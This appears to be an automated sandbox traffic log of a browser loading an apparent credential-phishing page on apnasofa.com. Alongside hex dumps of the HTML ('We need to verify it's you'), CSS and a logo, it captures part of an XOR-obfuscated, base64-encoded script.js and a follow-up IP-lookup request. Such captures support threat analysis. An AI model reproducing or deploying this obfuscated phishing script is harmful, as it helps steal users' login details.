                                                                        MS-CV: O5NI3Vm9Gkyc9Nz+.0
                                                                        X-Microsoft-SLSClientCache: 2880
                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 03 Dec 2024 16:49:40 GMT
                                                                        Connection: close
                                                                        Content-Length: 24490
                                                                        2024-12-03 16:49:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                        2024-12-03 16:49:41 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449758103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:42 UTC706OUTGET /episode/index HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-Dest: document
                                                                        Referer: https://i--iy.s3.us-east-1.amazonaws.com/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:43 UTC1028INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=2592000
                                                                        expires: Thu, 02 Jan 2025 16:49:43 GMT
                                                                        content-type: text/html
                                                                        last-modified: Thu, 28 Nov 2024 09:22:09 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 1471
                                                                        date: Tue, 03 Dec 2024 16:49:43 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:43 UTC340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 6c 65 61 73 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>pleased</title> <link rel="stylesheet" href="style.css"></head><body> <div class="container"
                                                                        2024-12-03 16:49:43 UTC1131INData Raw: 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 2f 6c 6f 67 6f 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 65 20 6e 65 65 64 20 74 6f 20 76 65 72 69 66 79 20 69 74 27 73 20 79 6f 75 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6d 61 69 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                        Data Ascii: tainer"> <img src="image/logo.png" class="logo" alt="Logo"> </div> <div class="header"> We need to verify it's you </div> <div class="email-container"> <div


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449759103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:43 UTC553OUTGET /episode/style.css HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: text/css,*/*;q=0.1
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: style
                                                                        Referer: https://apnasofa.com/episode/index
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:44 UTC1027INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=2592000
                                                                        expires: Thu, 02 Jan 2025 16:49:43 GMT
                                                                        content-type: text/css
                                                                        last-modified: Thu, 28 Nov 2024 13:58:47 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 3703
                                                                        date: Tue, 03 Dec 2024 16:49:43 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:44 UTC341INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 41 46 41 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 20 20 20
                                                                        Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { background-color: #FFFAFA; font-family: 'Segoe UI', Arial, sans-serif; line-height: 1.6; color: #333;}.container { max-width: 800px; margin: 40px auto;
                                                                        2024-12-03 16:49:44 UTC3362INData Raw: 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 7d 0a 0a 2f 2a 20 4c 6f 67 6f 20 53 74 79 6c 65 73 20 2a 2f 0a 2e 6c 6f 67 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 36 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20
                                                                        Data Ascii: px rgba(0, 0, 0, 0.1);}/* Logo Styles */.logo-container { text-align: center; margin-bottom: 20px; padding: 10px;}.logo { max-width: 160px; height: auto; margin: 0 auto;}.verification-section { text-align: center;


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449762103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:45 UTC604OUTGET /episode/image/logo.png HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://apnasofa.com/episode/index
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:46 UTC1030INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=31536000
                                                                        expires: Wed, 03 Dec 2025 16:49:45 GMT
                                                                        content-type: image/png
                                                                        last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 21327
                                                                        date: Tue, 03 Dec 2024 16:49:45 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:46 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                                        Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                                        2024-12-03 16:49:46 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                                        Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                                        2024-12-03 16:49:46 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                                        Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449763103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:45 UTC539OUTGET /episode/script.js HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://apnasofa.com/episode/index
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:46 UTC1066INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=2592000
                                                                        expires: Thu, 02 Jan 2025 16:49:45 GMT
                                                                        content-type: text/javascript
                                                                        last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 8831
                                                                        date: Tue, 03 Dec 2024 16:49:45 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        access-control-allow-origin: *
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:46 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                                        Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                                        2024-12-03 16:49:46 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                                        Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449767104.26.12.2054438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:48 UTC547OUTGET /?format=json HTTP/1.1
                                                                        Host: api.ipify.org
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://apnasofa.com
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://apnasofa.com/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:48 UTC463INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:49:48 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 21
                                                                        Connection: close
                                                                        Access-Control-Allow-Origin: *
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ec50d556ab943bf-EWR
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1609&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1125&delivery_rate=1768625&cwnd=252&unsent_bytes=0&cid=5c452ab189ac1039&ts=500&x=0"
                                                                        2024-12-03 16:49:48 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.449768103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:48 UTC353OUTGET /episode/script.js HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:49 UTC1066INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=2592000
                                                                        expires: Thu, 02 Jan 2025 16:49:49 GMT
                                                                        content-type: text/javascript
                                                                        last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 8831
                                                                        date: Tue, 03 Dec 2024 16:49:49 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        access-control-allow-origin: *
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
